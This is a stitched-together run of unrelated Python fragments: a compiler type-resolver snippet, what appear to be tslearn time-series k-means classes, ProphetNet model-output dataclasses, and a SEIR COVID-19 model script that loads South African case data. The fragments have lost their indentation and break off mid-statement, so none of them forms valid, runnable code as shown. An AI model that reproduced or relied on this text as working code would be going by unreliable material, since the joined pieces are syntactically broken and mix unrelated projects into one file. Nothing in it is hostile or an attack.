# self.logger.debug('resolve_TupleLiteral', self, literal, literal.owner, literal.getOwnerFunc())
if literal.expectedType:
assert isinstance(literal.expectedType, ast.UserType) and literal.expectedType.fullpath == 'Tuple' and isinstance(literal.expectedType.getTarget(), builtins.GenericTupleClassImpl), ('resolve_TupleLiteral', self, literal, literal.expectedType, literal.owner, literal.getOwnerFunc())
for i in range(len(literal.values)):
val = literal.values[i]
if literal.expectedType:
assert i < len(literal.expectedType.target.instantiation.genericArgs[0].types)
val.setExpectedType(literal.expectedType.target.instantiation.genericArgs[0].types[i])
val.visit(self)
if val.getType() is None:
assert literal.expectedType and isinstance(literal.expectedType, ast.UserType), ('resolve_TupleLiteral invalid type', literal.values, val, literal.expectedType, literal.getOwnerFunc())
if literal.getType() is None:
literal.setupType(ast.makeType(tuple([val.getType() for val in literal.values])), self)
def resolve_ListComprehensionFor(self, expr):
# self.logger.debug('ListComprehensionFor.resolve', self, expr)
expr.source.visit(self)
assert expr.source.getType().getItemType(), ('ListComprehensionFor.resolve', expr, | |
check_dims(X)
sample_weight = _check_sample_weight(sample_weight=sample_weight, X=X)
max_attempts = max(self.n_init, 10)
kernel_params = self._get_kernel_params()
if self.kernel == "gak":
self.sigma_gak_ = kernel_params.get("sigma", 1.)
if self.sigma_gak_ == "auto":
self.sigma_gak_ = sigma_gak(X)
else:
self.sigma_gak_ = None
self.labels_ = None
self.inertia_ = None
self.sample_weight_ = None
self._X_fit = None
# n_iter_ will contain the number of iterations the most
# successful run required.
self.n_iter_ = 0
n_samples = X.shape[0]
K = self._get_kernel(X)
sw = (sample_weight if sample_weight is not None
else numpy.ones(n_samples))
self.sample_weight_ = sw
rs = check_random_state(self.random_state)
last_correct_labels = None
min_inertia = numpy.inf
n_attempts = 0
n_successful = 0
while n_successful < self.n_init and n_attempts < max_attempts:
try:
if self.verbose and self.n_init > 1:
print("Init %d" % (n_successful + 1))
n_attempts += 1
self._fit_one_init(K, rs)
if self.inertia_ < min_inertia:
last_correct_labels = self.labels_
min_inertia = self.inertia_
self.n_iter_ = self._iter
n_successful += 1
except EmptyClusterError:
if self.verbose:
print("Resumed because of empty cluster")
if n_successful > 0:
self.labels_ = last_correct_labels
self.inertia_ = min_inertia
self._X_fit = X
return self
def _compute_dist(self, K, dist):
"""Compute a n_samples x n_clusters distance matrix using the kernel
trick."""
sw = self.sample_weight_
for j in range(self.n_clusters):
mask = (self.labels_ == j)
if numpy.sum(mask) == 0:
raise EmptyClusterError("try smaller n_cluster or better "
"kernel parameters")
# NB: we use a normalized kernel so k(x,x) = 1 for all x
# (including the centroid)
dist[:, j] = 2 - 2 * numpy.sum(sw[mask] * K[:, mask],
axis=1) / sw[mask].sum()
@staticmethod
def _compute_inertia(dist_sq):
return dist_sq.min(axis=1).sum()
def fit_predict(self, X, y=None):
"""Fit kernel k-means clustering using X and then predict the closest
cluster each time series in X belongs to.
It is more efficient to use this method than to sequentially call fit
and predict.
Parameters
----------
X : array-like of shape=(n_ts, sz, d)
Time series dataset to predict.
y
Ignored
Returns
-------
labels : array of shape=(n_ts, )
Index of the cluster each sample belongs to.
"""
return self.fit(X, y).labels_
def predict(self, X):
"""Predict the closest cluster each time series in X belongs to.
Parameters
----------
X : array-like of shape=(n_ts, sz, d)
Time series dataset to predict.
Returns
-------
labels : array of shape=(n_ts, )
Index of the cluster each sample belongs to.
"""
X = check_array(X, allow_nd=True, force_all_finite=False)
check_is_fitted(self, '_X_fit')
X = check_dims(X, X_fit_dims=self._X_fit.shape,
check_n_features_only=True)
K = self._get_kernel(X, self._X_fit)
n_samples = X.shape[0]
dist = numpy.zeros((n_samples, self.n_clusters))
self._compute_dist(K, dist)
return dist.argmin(axis=1)
def _more_tags(self):
return {'allow_nan': True, 'allow_variable_length': True}
class GlobalAlignmentKernelKMeans(KernelKMeans):
def __init__(self, **kwargs):
warnings.warn(
"`GlobalAlignmentKernelKMeans` is deprecated in version "
"0.4 and will be removed in 0.6. Use `KernelKMeans` "
"instead.",
DeprecationWarning, stacklevel=2)
super().__init__(**kwargs)
self.kernel = "gak"
class TimeSeriesKMeans(TransformerMixin, ClusterMixin,
TimeSeriesCentroidBasedClusteringMixin,
BaseModelPackage, TimeSeriesBaseEstimator):
"""K-means clustering for time-series data.
Parameters
----------
n_clusters : int (default: 3)
Number of clusters to form.
max_iter : int (default: 50)
Maximum number of iterations of the k-means algorithm for a single run.
tol : float (default: 1e-6)
Inertia variation threshold. If at some point, inertia varies less than
this threshold between two consecutive
iterations, the model is considered to have converged and the algorithm
stops.
n_init : int (default: 1)
Number of time the k-means algorithm will be run with different
centroid seeds. The final results will be the best output of n_init
consecutive runs in terms of inertia.
metric : {"euclidean", "dtw", "softdtw"} (default: "euclidean")
Metric to be used for both cluster assignment and barycenter
computation. If "dtw", DBA is used for barycenter
computation.
max_iter_barycenter : int (default: 100)
Number of iterations for the barycenter computation process. Only used
if `metric="dtw"` or `metric="softdtw"`.
metric_params : dict or None (default: None)
Parameter values for the chosen metric.
For metrics that accept parallelization of the cross-distance matrix
computations, `n_jobs` key passed in `metric_params` is overridden by
the `n_jobs` argument.
n_jobs : int or None, optional (default=None)
The number of jobs to run in parallel for cross-distance matrix
computations.
Ignored if the cross-distance matrix cannot be computed using
parallelization.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See scikit-learns'
`Glossary <https://scikit-learn.org/stable/glossary.html#term-n-jobs>`_
for more details.
dtw_inertia: bool (default: False)
Whether to compute DTW inertia even if DTW is not the chosen metric.
verbose : int (default: 0)
If nonzero, print information about the inertia while learning
the model and joblib progress messages are printed.
random_state : integer or numpy.RandomState, optional
Generator used to initialize the centers. If an integer is given, it
fixes the seed. Defaults to the global
numpy random number generator.
init : {'k-means++', 'random' or an ndarray} (default: 'k-means++')
Method for initialization:
'k-means++' : use k-means++ heuristic. See `scikit-learn's k_init_
<https://github.com/scikit-learn/scikit-learn/blob/master/sklearn/\
cluster/k_means_.py>`_ for more.
'random': choose k observations (rows) at random from data for the
initial centroids.
If an ndarray is passed, it should be of shape (n_clusters, ts_size, d)
and gives the initial centers.
Attributes
----------
labels_ : numpy.ndarray
Labels of each point.
cluster_centers_ : numpy.ndarray of shape (n_clusters, sz, d)
Cluster centers.
`sz` is the size of the time series used at fit time if the init method
is 'k-means++' or 'random', and the size of the longest initial
centroid if those are provided as a numpy array through init parameter.
inertia_ : float
Sum of distances of samples to their closest cluster center.
n_iter_ : int
The number of iterations performed during fit.
Notes
-----
If `metric` is set to `"euclidean"`, the algorithm expects a dataset of
equal-sized time series.
Examples
--------
>>> from tslearn.generators import random_walks
>>> X = random_walks(n_ts=50, sz=32, d=1)
>>> km = TimeSeriesKMeans(n_clusters=3, metric="euclidean", max_iter=5,
... random_state=0).fit(X)
>>> km.cluster_centers_.shape
(3, 32, 1)
>>> km_dba = TimeSeriesKMeans(n_clusters=3, metric="dtw", max_iter=5,
... max_iter_barycenter=5,
... random_state=0).fit(X)
>>> km_dba.cluster_centers_.shape
(3, 32, 1)
>>> km_sdtw = TimeSeriesKMeans(n_clusters=3, metric="softdtw", max_iter=5,
... max_iter_barycenter=5,
... metric_params={"gamma": .5},
... random_state=0).fit(X)
>>> km_sdtw.cluster_centers_.shape
(3, 32, 1)
>>> X_bis = to_time_series_dataset([[1, 2, 3, 4],
... [1, 2, 3],
... [2, 5, 6, 7, 8, 9]])
>>> km = TimeSeriesKMeans(n_clusters=2, max_iter=5,
... metric="dtw", random_state=0).fit(X_bis)
>>> km.cluster_centers_.shape
(2, 6, 1)
"""
def __init__(self, n_clusters=3, max_iter=50, tol=1e-6, n_init=1,
metric="euclidean", max_iter_barycenter=100,
metric_params=None, n_jobs=None, dtw_inertia=False,
verbose=0, random_state=None, init='k-means++'):
self.n_clusters = n_clusters
self.max_iter = max_iter
self.tol = tol
self.n_init = n_init
self.metric = metric
self.max_iter_barycenter = max_iter_barycenter
self.metric_params = metric_params
self.n_jobs = n_jobs
self.dtw_inertia = dtw_inertia
self.verbose = verbose
self.random_state = random_state
self.init = init
def _is_fitted(self):
check_is_fitted(self, ['cluster_centers_'])
return True
def _get_metric_params(self):
if self.metric_params is None:
metric_params = {}
else:
metric_params = self.metric_params.copy()
if "n_jobs" in metric_params.keys():
del metric_params["n_jobs"]
return metric_params
def _fit_one_init(self, X, x_squared_norms, rs):
metric_params = self._get_metric_params()
n_ts, sz, d = X.shape
if hasattr(self.init, '__array__'):
self.cluster_centers_ = self.init.copy()
elif isinstance(self.init, str) and self.init == "k-means++":
if self.metric == "euclidean":
self.cluster_centers_ = _kmeans_plusplus(
X.reshape((n_ts, -1)),
self.n_clusters,
x_squared_norms=x_squared_norms,
random_state=rs
)[0].reshape((-1, sz, d))
else:
if self.metric == "dtw":
def metric_fun(x, y):
return cdist_dtw(x, y, n_jobs=self.n_jobs,
verbose=self.verbose, **metric_params)
elif self.metric == "softdtw":
def metric_fun(x, y):
return cdist_soft_dtw(x, y, **metric_params)
else:
raise ValueError(
"Incorrect metric: %s (should be one of 'dtw', "
"'softdtw', 'euclidean')" % self.metric
)
self.cluster_centers_ = _k_init_metric(X, self.n_clusters,
cdist_metric=metric_fun,
random_state=rs)
elif self.init == "random":
indices = rs.choice(X.shape[0], self.n_clusters)
self.cluster_centers_ = X[indices].copy()
else:
raise ValueError("Value %r for parameter 'init'"
"is invalid" % self.init)
self.cluster_centers_ = _check_full_length(self.cluster_centers_)
old_inertia = numpy.inf
for it in range(self.max_iter):
self._assign(X)
if self.verbose:
print("%.3f" % self.inertia_, end=" --> ")
self._update_centroids(X)
if numpy.abs(old_inertia - self.inertia_) < self.tol:
break
old_inertia = self.inertia_
if self.verbose:
print("")
self._iter = it + 1
return self
def _transform(self, X):
metric_params = self._get_metric_params()
if self.metric == "euclidean":
return cdist(X.reshape((X.shape[0], -1)),
self.cluster_centers_.reshape((self.n_clusters, -1)),
metric="euclidean")
elif self.metric == "dtw":
return cdist_dtw(X, self.cluster_centers_, n_jobs=self.n_jobs,
verbose=self.verbose, **metric_params)
elif self.metric == "softdtw":
return cdist_soft_dtw(X, self.cluster_centers_, **metric_params)
else:
raise ValueError("Incorrect metric: %s (should be one of 'dtw', "
"'softdtw', 'euclidean')" % self.metric)
def _assign(self, X, update_class_attributes=True):
dists = self._transform(X)
matched_labels = dists.argmin(axis=1)
if update_class_attributes:
self.labels_ = matched_labels
_check_no_empty_cluster(self.labels_, self.n_clusters)
if self.dtw_inertia and self.metric != "dtw":
inertia_dists = cdist_dtw(X, self.cluster_centers_,
n_jobs=self.n_jobs,
verbose=self.verbose)
else:
inertia_dists = dists
self.inertia_ = _compute_inertia(inertia_dists,
self.labels_,
self._squared_inertia)
| |
(:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape :obj:`(batch_size, num_attn_heads,
decoder_sequence_length, decoder_sequence_length)`.
Attentions weights of the decoder, after the attention softmax, used to compute the weighted average in the
self-attention heads.
decoder_ngram_attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape :obj:`(batch_size, num_attn_heads,
decoder_sequence_length, decoder_sequence_length)`.
Attentions weights of the predict stream of the decoder, after the attention softmax, used to compute the
weighted average in the self-attention heads.
decoder_cross_attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape :obj:`(batch_size, num_attn_heads,
encoder_sequence_length, decoder_sequence_length)`.
Attentions weights of the cross-attention layer of the decoder, after the attention softmax, used to
compute the weighted average in the
encoder_last_hidden_state (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, encoder_sequence_length, hidden_size)`, `optional`):
Sequence of hidden-states at the output of the last layer of the encoder of the model.
encoder_hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):
Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)
of shape :obj:`(batch_size, encoder_sequence_length, hidden_size)`.
Hidden-states of the encoder at the output of each layer plus the initial embedding outputs.
encoder_attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape :obj:`(batch_size, num_attn_heads,
encoder_sequence_length, encoder_sequence_length)`. Attentions weights of the encoder, after the attention
softmax, used to compute the weighted average in the self-attention heads.
"""
loss: Optional[torch.FloatTensor] = None
logits: torch.FloatTensor = None
logits_ngram: Optional[torch.FloatTensor] = None
past_key_values: Optional[Tuple[torch.FloatTensor]] = None
decoder_hidden_states: Optional[Tuple[torch.FloatTensor]] = None
decoder_ngram_hidden_states: Optional[Tuple[torch.FloatTensor]] = None
decoder_attentions: Optional[Tuple[torch.FloatTensor]] = None
decoder_ngram_attentions: Optional[Tuple[torch.FloatTensor]] = None
decoder_cross_attentions: Optional[Tuple[torch.FloatTensor]] = None
encoder_last_hidden_state: Optional[torch.FloatTensor] = None
encoder_hidden_states: Optional[Tuple[torch.FloatTensor]] = None
encoder_attentions: Optional[Tuple[torch.FloatTensor]] = None
@dataclass
class ProphetNetSeq2SeqModelOutput(ModelOutput):
"""
Base class for model encoder's outputs that also contains : pre-computed hidden states that can speed up sequential
decoding.
Args:
last_hidden_state (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, decoder_sequence_length, hidden_size)`):
Sequence of main stream hidden-states at the output of the last layer of the decoder of the model.
If :obj:`past_key_values` is used only the last hidden-state of the sequences of shape :obj:`(batch_size,
1, hidden_size)` is output.
last_hidden_state_ngram (:obj:`torch.FloatTensor` of shape :obj:`(batch_size,ngram * decoder_sequence_length, config.vocab_size)`):
Sequence of predict stream hidden-states at the output of the last layer of the decoder of the model.
past_key_values (:obj:`List[torch.FloatTensor]`, `optional`, returned when ``use_cache=True`` is passed or when ``config.use_cache=True``):
List of :obj:`torch.FloatTensor` of length :obj:`config.n_layers`, with each tensor of shape :obj:`(2,
batch_size, num_attn_heads, decoder_sequence_length, embed_size_per_head)`).
Contains pre-computed hidden-states (key and values in the attention blocks) of the decoder that can be
used (see :obj:`past_key_values` input) to speed up sequential decoding.
decoder_hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):
Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)
of shape :obj:`(batch_size, decoder_sequence_length, hidden_size)`.
Hidden-states of main stream of the decoder at the output of each layer plus the initial embedding outputs.
decoder_ngram_hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):
Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)
of shape :obj:`(batch_size, ngram * decoder_sequence_length, hidden_size)`.
Hidden-states of the predict stream of the decoder at the output of each layer plus the initial embedding
outputs.
decoder_attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape :obj:`(batch_size, num_attn_heads,
decoder_sequence_length, decoder_sequence_length)`.
Attentions weights of the decoder, after the attention softmax, used to compute the weighted average in the
self-attention heads.
decoder_ngram_attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape :obj:`(batch_size, num_attn_heads,
decoder_sequence_length, decoder_sequence_length)`.
Attentions weights of the predict stream of the decoder, after the attention softmax, used to compute the
weighted average in the
decoder_cross_attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape :obj:`(batch_size, num_attn_heads,
encoder_sequence_length, decoder_sequence_length)`.
Attentions weights of the cross-attention layer of the decoder, after the attention softmax, used to
compute the weighted average in the
encoder_last_hidden_state (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, encoder_sequence_length, hidden_size)`, `optional`):
Sequence of hidden-states at the output of the last layer of the encoder of the model.
encoder_hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):
Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)
of shape :obj:`(batch_size, encoder_sequence_length, hidden_size)`.
Hidden-states of the encoder at the output of each layer plus the initial embedding outputs.
encoder_attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape :obj:`(batch_size, num_attn_heads,
encoder_sequence_length, encoder_sequence_length)`.
Attentions weights of the encoder, after the attention softmax, used to compute the weighted average in the
self-attention heads.
"""
last_hidden_state: torch.FloatTensor
last_hidden_state_ngram: Optional[torch.FloatTensor] = None
past_key_values: Optional[Tuple[torch.FloatTensor]] = None
decoder_hidden_states: Optional[Tuple[torch.FloatTensor]] = None
decoder_ngram_hidden_states: Optional[Tuple[torch.FloatTensor]] = None
decoder_attentions: Optional[Tuple[torch.FloatTensor]] = None
decoder_ngram_attentions: Optional[Tuple[torch.FloatTensor]] = None
decoder_cross_attentions: Optional[Tuple[torch.FloatTensor]] = None
encoder_last_hidden_state: Optional[torch.FloatTensor] = None
encoder_hidden_states: Optional[Tuple[torch.FloatTensor]] = None
encoder_attentions: Optional[Tuple[torch.FloatTensor]] = None
@dataclass
class ProphetNetDecoderModelOutput(ModelOutput):
"""
Base class for model's outputs that may also contain a past key/values (to speed up sequential decoding).
Args:
last_hidden_state (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, decoder_sequence_length, hidden_size)`):
Sequence of main stream hidden-states at the output of the last layer of the decoder of the model.
If :obj:`past_key_values` is used only the last hidden-state of the sequences of shape :obj:`(batch_size,
1, hidden_size)` is output.
last_hidden_state_ngram (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, ngram * decoder_sequence_length, config.vocab_size)`):
Sequence of predict stream hidden-states at the output of the last layer of the decoder of the model.
past_key_values (:obj:`List[torch.FloatTensor]`, `optional`, returned when ``use_cache=True`` is passed or when ``config.use_cache=True``):
List of :obj:`torch.FloatTensor` of length :obj:`config.n_layers`, with each tensor of shape :obj:`(2,
batch_size, num_attn_heads, decoder_sequence_length, embed_size_per_head)`).
Contains pre-computed hidden-states (key and values in the attention blocks) of the decoder that can be
used (see :obj:`past_key_values` input) to speed up sequential decoding.
hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):
Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)
of shape :obj:`(batch_size, decoder_sequence_length, hidden_size)`.
Hidden-states of main stream of the decoder at the output of each layer plus the initial embedding outputs.
ngram_hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):
Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)
of shape :obj:`(batch_size, ngram * decoder_sequence_length, hidden_size)`.
Hidden-states of the predict stream of the decoder at the output of each layer plus the initial embedding
outputs.
attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape :obj:`(batch_size, num_attn_heads,
decoder_sequence_length, decoder_sequence_length)`.
Attentions weights of the decoder, after the attention softmax, used to compute the weighted average in the
self-attention heads.
ngram_attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape :obj:`(batch_size, num_attn_heads,
decoder_sequence_length, decoder_sequence_length)`.
Attentions weights of the predict stream of the decoder, after the attention softmax, used to compute the
weighted average in the
cross_attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape :obj:`(batch_size, num_attn_heads,
encoder_sequence_length, decoder_sequence_length)`.
Attentions weights of the cross-attention layer of the decoder, after the attention softmax, used to
compute the weighted average in the
"""
last_hidden_state: torch.FloatTensor
last_hidden_state_ngram: Optional[torch.FloatTensor] = None
past_key_values: Optional[Tuple[torch.FloatTensor]] = None
hidden_states: Optional[Tuple[torch.FloatTensor]] = None
hidden_states_ngram: Optional[Tuple[torch.FloatTensor]] = None
attentions: Optional[Tuple[torch.FloatTensor]] = None
ngram_attentions: Optional[Tuple[torch.FloatTensor]] = None
cross_attentions: Optional[Tuple[torch.FloatTensor]] = None
@dataclass
class ProphetNetDecoderLMOutput(ModelOutput):
"""
Base class for model's outputs that may also contain a past key/values (to speed up sequential decoding).
Args:
loss (:obj:`torch.FloatTensor` of shape :obj:`(1,)`, `optional`, | |
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import datetime
from seir.wrapper import MultiPopWrapper
from seir.utils import plot_solution
# read calibration data
actual_hospitalisations = pd.read_excel('data/calibration.xlsx', sheet_name='Hospitalisations')
actual_hospitalisations['Date'] = [pd.to_datetime(x, ).date() for x in actual_hospitalisations['Date']]
# TODO: should check if file is downloaded: if not, download, then use the downloaded file
actual_infections = pd.read_csv(
'https://raw.githubusercontent.com/dsfsi/covid19za/master/data/covid19za_provincial_cumulative_timeline_confirmed.csv')
actual_infections.rename(columns={'date': 'Date', 'total': 'Cum. Confirmed'}, inplace=True)
actual_infections.index = pd.to_datetime(actual_infections['Date'], dayfirst=True)
actual_infections = actual_infections.resample('D').mean().ffill().reset_index()
actual_infections['Date'] = [pd.to_datetime(x, dayfirst=True).date() for x in actual_infections['Date']]
# TODO: should check if file is downloaded: if not, download, then use the downloaded file
reported_deaths = pd.read_csv(
'https://raw.githubusercontent.com/dsfsi/covid19za/master/data/covid19za_timeline_deaths.csv')
reported_deaths.rename(columns={'date': 'Date'}, inplace=True)
reported_deaths['Date'] = [pd.to_datetime(x, dayfirst=True).date() for x in reported_deaths['Date']]
actual_deaths = reported_deaths.groupby('Date').report_id.count().reset_index()
actual_deaths.rename(columns={'report_id': 'Daily deaths'}, inplace=True)
actual_deaths.index = pd.to_datetime(actual_deaths['Date'])
actual_deaths = actual_deaths.resample('D').mean().fillna(0).reset_index()
actual_deaths['Cum. Deaths'] = np.cumsum(actual_deaths['Daily deaths'])
# variable parameters for front-end
asymptomatic_prop = 0.75 # 0.2-0.8
asymp_rel_infectivity = 0.5 # 0.3 - 1
asymp_prop_imported = 0.0 # 0 - 0.8
r0 = 2.6 # 1.5 - 5.5
lockdown_ratio = 0.6 # 0.25 - 0.8
imported_scale = 2.5 # 0.5 - 2
lockdown_period = 35 # 35, 42, 49, 56, 63, 70
social_distancing_ratio = 0.75 # 0.5-1
period_asymp = 2.3 # 8-12
period_mild_infect = 2.3 # 2-4
period_severe_infect = 2.3 # 2-4
period_severe_isolate = 6 - period_severe_infect
period_hosp_if_not_icu = 10 # 6-10
period_hosp_if_icu = 8 # 6-10
period_icu_if_recover = 10 # 8-12
period_icu_if_die = 6 # 3-7
mort_loading = 1.0 # 0.5 - 1.5
prop_mild_detected = 0.3 # 0.2 - 0.8
hosp_to_icu = 0.2133 # 0.1 - 0.4 (0.21330242 = Ferguson)
descr = 'asymp_' + str(asymptomatic_prop) + '_R0_' + str(r0) + '_imported_scale_' + str(
imported_scale) + '_lockdown_' + str(lockdown_ratio) + '_postlockdown_' + str(
social_distancing_ratio) + '_ICU_' + str(hosp_to_icu) + '_mort_' + str(mort_loading) + '_asympinf_' + str(
asymp_rel_infectivity)
full_descr = f'Baseline R0: {r0:.1f}, asymptomatic proportion: {asymptomatic_prop:.0%}, asymptomatic relative ' \
f'infectiousness {asymp_rel_infectivity:.0%}, {prop_mild_detected:.0%} of mild cases detected \n '
full_descr += f'Imported scaling factor {imported_scale:.2f}, asymptomatic proportion imported {asymp_prop_imported:.0%}\n '
full_descr += f'Lockdown period: {lockdown_period:,.0f}, R0 relative to baseline {lockdown_ratio:.0%} in lockdown,' \
f'{social_distancing_ratio:.0%} post-lockdown \n '
full_descr += f'Infectious days pre-isolation: {period_asymp} asymptomatic, {period_mild_infect} mild, {period_severe_infect} severe; severe isolation days pre-hospitalisation: {period_severe_isolate} \n'
full_descr += f'Hospital days: {period_hosp_if_not_icu} not critical, {period_hosp_if_icu} critical plus {period_icu_if_recover} in ICU if recover/{period_icu_if_die} if die \n'
full_descr += f'Proportion of hospitalised cases ending in ICU: {hosp_to_icu:.2%}, mortality loading {mort_loading:.0%}'
# get s0 from file:
df = pd.read_csv('data/Startpop_2density_0comorbidity.csv') # , index_col=0)
df['density'] = df['density'].map({'High': 'high', 'Low': 'low'})
df['label'] = df['age'].str.lower() + '_' + df['sex'].str.lower() + '_' + df['density'].str.lower()
df_dict = df[['label', 'Population']].to_dict()
s_0 = {df_dict['label'][i]: df_dict['Population'][i] for i in df_dict['label'].keys()}
# Ferguson et al. parameterisation
ferguson = {'0-9': [0.001, 0.05, 0.00002],
'10-19': [0.003, 0.05, 0.00006],
'20-29': [0.012, 0.05, 0.0003],
'30-39': [0.032, 0.05, 0.0008],
'40-49': [0.049, 0.063, 0.0015],
'50-59': [0.102, 0.122, 0.006],
'60-69': [0.166, 0.274, 0.022],
'70-79': [0.243, 0.432, 0.051],
'80+': [0.273, 0.709, 0.093]}
# work out deaths as % of those entering ICU
for key in ferguson:
# TODO: add this calc to the df, not to the lists.
ferguson[key].append(ferguson[key][2] / ferguson[key][1] / ferguson[key][0])
# age profile - calculate ICU transition adjustment
age_profile = df.groupby('age').Population.sum().reset_index()
ferguson_df = pd.DataFrame(ferguson).T.reset_index()
ferguson_df.rename(columns={'index': 'age', 0: 'symp_to_hosp', 1: 'hosp_to_icu', 2: 'symp_to_dead', 3: 'icu_to_dead'},
inplace=True)
age_profile['Proportion'] = age_profile['Population'] / age_profile['Population'].sum()
age_profile = age_profile.merge(ferguson_df[['age', 'symp_to_hosp', 'hosp_to_icu']], on='age')
age_profile['hosp'] = age_profile['Proportion'] * age_profile['symp_to_hosp']
age_profile['prop_hosp'] = age_profile['hosp'] / age_profile['hosp'].sum()
age_profile['overall_hosp_to_icu'] = age_profile['prop_hosp'] * age_profile['hosp_to_icu']
overall_hosp_to_icu = age_profile['overall_hosp_to_icu'].sum()
icu_adjustment = hosp_to_icu / overall_hosp_to_icu # ~1 when hosp_to_icu is == ferguson number
# hard-coded parameters
infectious_func = lambda t: 1 if t < 11 else (
1 - (1 - social_distancing_ratio) / 11 * (t - 11)) if 11 <= t < 22 else lockdown_ratio if 22 <= t < (
22 + lockdown_period) else social_distancing_ratio
c = 1
s = 0.06 # proportion of imported cases below 60 that are severe (1-s are mild)
# scale of ferguson ratio for 60+ - setting to inverse value from ferguson means we assume 100% of cases 60+ are severe
scale = {'60-69': 1,
'70-79': 1/ferguson['70-79'][0],
'80+': 1/ferguson['80+'][0]}
a = 0.25
l = asymp_prop_imported / (1 - asymp_prop_imported)
x = c * imported_scale
imported_func = lambda t: {'0-9_male_high': [0.0101 * x * l * np.exp(a * t), 0.0101 * x * (1 - s) * np.exp(a * t),
0.0101 * x * s * np.exp(a * t), 0, 0, 0],
'10-19_male_high': [0.0101 * x * l * np.exp(a * t), 0.0101 * x * (1 - s) * np.exp(a * t),
0.0101 * x * s * np.exp(a * t), 0, 0, 0],
'20-29_male_high': [0.0657 * x * l * np.exp(a * t), 0.0657 * x * (1 - s) * np.exp(a * t),
0.0657 * x * s * np.exp(a * t), 0, 0, 0],
'30-39_male_high': [0.1768 * x * l * np.exp(a * t), 0.1768 * x * (1 - s) * np.exp(a * t),
0.1768 * x * s * np.exp(a * t), 0, 0, 0],
'40-49_male_high': [0.0960 * x * l * np.exp(a * t), 0.0960 * x * (1 - s) * np.exp(a * t),
0.0960 * x * s * np.exp(a * t), 0, 0, 0],
'50-59_male_high': [0.1717 * x * l * np.exp(a * t), 0.1717 * x * (1 - ferguson['50-59'][0]) * np.exp(a * t),
0.1717 * x * ferguson['50-59'][0] * np.exp(a * t), 0, 0, 0],
'60-69_male_high': [0.0758 * x * l * np.exp(a * t), 0.0758 * x * (1 - scale['60-69'] * ferguson['60-69'][0]) * np.exp(a * t), 0.0758 * x * scale['60-69'] * ferguson['60-69'][0] * np.exp(a * t), 0, 0, 0],
'70-79_male_high': [0.0202 * x * l * np.exp(a * t), 0.0202 * x * (1 - scale['70-79'] * ferguson['70-79'][0]) * np.exp(a * t), 0.0202 * x * scale['70-79'] * ferguson['70-79'][0] * np.exp(a * t), 0, 0, 0],
'80+_male_high': [0.0051 * x * l * np.exp(a * t), 0.0051 * x * (1 - scale['80+'] * ferguson['80+'][0]) * np.exp(a * t), 0.0051 * x * scale['80+'] * ferguson['80+'][0] * np.exp(a * t), 0, 0, 0],
'0-9_female_high': [0.0000 * x * l * np.exp(a * t), 0.0000 * x * (1 - s) * np.exp(a * t),
0.0000 * x * s * np.exp(a * t), 0, 0, 0],
'10-19_female_high': [0.0101 * x * l * np.exp(a * t), 0.0101 * x * (1 - s) * np.exp(a * t),
0.0101 * x * s * np.exp(a * t), 0, 0, 0],
'20-29_female_high': [0.0606 * x * l * np.exp(a * t), 0.0606 * x * (1 - s) * np.exp(a * t),
